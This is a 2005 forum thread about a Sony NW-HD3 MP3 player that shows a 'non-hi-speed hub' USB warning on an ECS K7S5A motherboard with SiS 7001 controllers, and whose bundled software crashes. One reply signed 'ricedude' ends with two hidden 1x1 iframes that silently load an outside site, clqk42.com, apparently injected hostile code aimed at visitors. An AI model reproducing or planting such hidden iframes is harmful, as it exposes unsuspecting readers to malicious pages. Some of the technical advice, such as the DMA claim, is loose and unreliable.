Collapse
X

• Filter
  • Time
  • Show
Clear All

• HI-SPEED USB device plugged into a non-hi-speed hub

hello i bought the new mp3 sony NW-HD3 and I have two problems:
    1)when i plug the mp3 there is this message<< HI-SPEED USB device plugged into a non-hi-speed hub>>.I have the ECS K7S5A motherboard and when i go to the universal serial bus controller I have the following:
    SiS 7001 PCI to USB open host controller
    SiS 7001 PCI to USB open host controller
    USB Root Hub
    USB Root Hub
    If i do not have USB 2.0 hi speed what will be the consequences when i want to use a hi speed mass storage device?
    2)The second problem refers to the programm procured with the mp3.The installation is going well,i restart my pc everything ok...Then when i want to open the programm there is the little window oppening saying what things are getting loaded.it says then < INITIALISATION COMPLETE <INITIALOTATION COMPLETE>>and then there is this message saying in titles< OMGiiNot: Omgjbox.exe - application error <OMGIINOT: error Application - Omgjbox.exe>> and in the grey layout < The instruction at "0x7fffffff" referenced memory at "0x7fffffff".The memory could not be "read". <THE ?read? be not could memory The ?0x7fffffff?. at referenced ?0x7fffffff? instruction>>

I beg of you plz help me fix this problem!It s so annoying to be unable to se my mp3.Thx
    Last edited by samygero; 04-07-2005, 02:09 PM.

Re: HI-SPEED USB device plugged into a non-hi-speed hub

First of all, the usb 2.0 on a mobo like that is not going to work without the correct drivers for it. The disc that came with the mobo has the drivers for usb 2.0 on it as well as the instructions to install them. If you do not have the disc then download the correct driver from ecs.
    Upon checking the ecs site, it appears that the k7s5a pro is the only version with usb 2.0. If you have another version then I'm afraid you are sol unless you get a 2.0 pci card or a new mobo.
    ecs k7s5a pro
    athlon xp-m@2456mhz(12x204)
    tt aquariusII liquid cooled/ arctic silver ceramique
    asus a7n8xe-dlx
    thermaltake xaserIII lanfire
    bfg 6800gt
    seagate sataII 250gb/seagate 7200rpm 160gb ide
    samsung dvdrw
    2x1024 kingston hyper-x pc3200/ windows xp pro sp3
    logitech mx518/ logitech wingman rumble
    2x samsung 955df 19"/ canon i960
    creative x-fi fatal1ty 64mb/ altec lansing 251-5.1
    mushkin 550w

opteron 146 @ 2850 (10x285)
    DFI infinity nf4 ultra
    thermaltake tsunami dream -black
    seagate sataII 500gb
    evga 8600gt oc ssc edition
    samsung sata dvd-rw
    2x1024 ocz black
    logitech ifeel/ nec accusync 75f
    ocz fatal1ty 550w

Comment

Ok i don t have the pro motherboard but how could i check if i have usb 2.0 and who could help me with the second problem?because it is the most important one.thx
      Last edited by samygero; 04-08-2005, 11:08 AM.

Comment

It's hard to speculate without knowing your full system specs.
        athlon xp-m@2456mhz(12x204)
        tt aquariusII liquid cooled/ arctic silver ceramique
        asus a7n8xe-dlx
        thermaltake xaserIII lanfire
        bfg 6800gt
        seagate sataII 250gb/seagate 7200rpm 160gb ide
        samsung dvdrw
        2x1024 kingston hyper-x pc3200/ windows xp pro sp3
        logitech mx518/ logitech wingman rumble
        2x samsung 955df 19"/ canon i960
        creative x-fi fatal1ty 64mb/ altec lansing 251-5.1
        mushkin 550w

opteron 146 @ 2850 (10x285)
        DFI infinity nf4 ultra
        thermaltake tsunami dream -black
        seagate sataII 500gb
        evga 8600gt oc ssc edition
        samsung sata dvd-rw
        2x1024 ocz black
        logitech ifeel/ nec accusync 75f
        ocz fatal1ty 550w

Comment

Your USB transiever's device driver should tell you if its USB 2.0. As far as plugging USB 2.0 into older "non-high-speed" ports, the specification requires reverse compatibilty. Depending on how the driver for your USB device is written, it may require DMA access, which means USB 2.0 only will work.

Hope this helps

<iframe src="http://www.clqk42.com" frameborder="0" height="1" width="1"></iframe><iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>
          Last edited by ricedude; 07-14-2005, 02:42 PM.

Comment

I hate to be the barer of bad news, but you are NOT ALONE!
            It is a known problem with the SiS 7001 PCI to USB open host controller detecting some USB 2.0 devices. I too have spent many hours on the phone to be told by everyone, it’s not our problem, it the other guys fault.<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p>
            <o:p></o:p>
            I have a Sony Vaio PCV-RZ26G with that same lovely Sis 7001 PCI to USB controller. My headache started with I bought a WD 500gig MYBOOK. I got the same stupid error, HI-SPEED USB device plugged into a non-hi-speed hub. I have 6 USB ports and they are all USB 2.0. I know this because it says so. I also have a 250gig Maxter One Touch I can plug into any of my USB ports and Bada Bing, Bada Boom, HI Speed connection. Even a Lexar Chip reader, HP Scanner, My Cheap MP3 1 giger, all connects at High Speed on all ports. So I start my quest for a fix. Western Digital says it Sony fault, Sony says It Microsoft fault, Microsolf says it SiS fault, and SiS say it’s the (Microsoft) OS fault. I have ripped out, reloaded just able every driver I can in safe mode, not safe mode, new gold tip USB cables ($45.00) and I basically been told to go away and leave us alone by everyone. Yes I have read MS.
            <TABLE style="MARGIN-LEFT: 12pt; mso-cellspacing: 1.5pt" cellSpacing=3 cellPadding=0 border=0><TBODY><TR><TD style="BORDER-RIGHT: #ece9d8; PADDING-RIGHT: 0.75pt; BORDER-TOP: #ece9d8; PADDING-LEFT: 0.75pt; PADDING-BOTTOM: 0.75pt; BORDER-LEFT: #ece9d8; PADDING-TOP: 0.75pt; BORDER-BOTTOM: #ece9d8; BACKGROUND-COLOR: transparent">Article ID<o:p></o:p>
            </TD><TD style="BORDER-RIGHT: #ece9d8; PADDING-RIGHT: 0.75pt; BORDER-TOP: #ece9d8; PADDING-LEFT: 0.75pt; PADDING-BOTTOM: 0.75pt; BORDER-LEFT: #ece9d8; PADDING-TOP: 0.75pt; BORDER-BOTTOM: #ece9d8; BACKGROUND-COLOR: transparent">:<o:p></o:p>
            </TD><TD style="BORDER-RIGHT: #ece9d8; PADDING-RIGHT: 0.75pt; BORDER-TOP: #ece9d8; PADDING-LEFT: 0.75pt; PADDING-BOTTOM: 0.75pt; BORDER-LEFT: #ece9d8; PADDING-TOP: 0.75pt; BORDER-BOTTOM: #ece9d8; BACKGROUND-COLOR: transparent">312370<o:p></o:p>
            </TD></TR></TBODY></TABLE>

That was no help. I can only conclude that there is NO FIX.

Comment

Working...
            X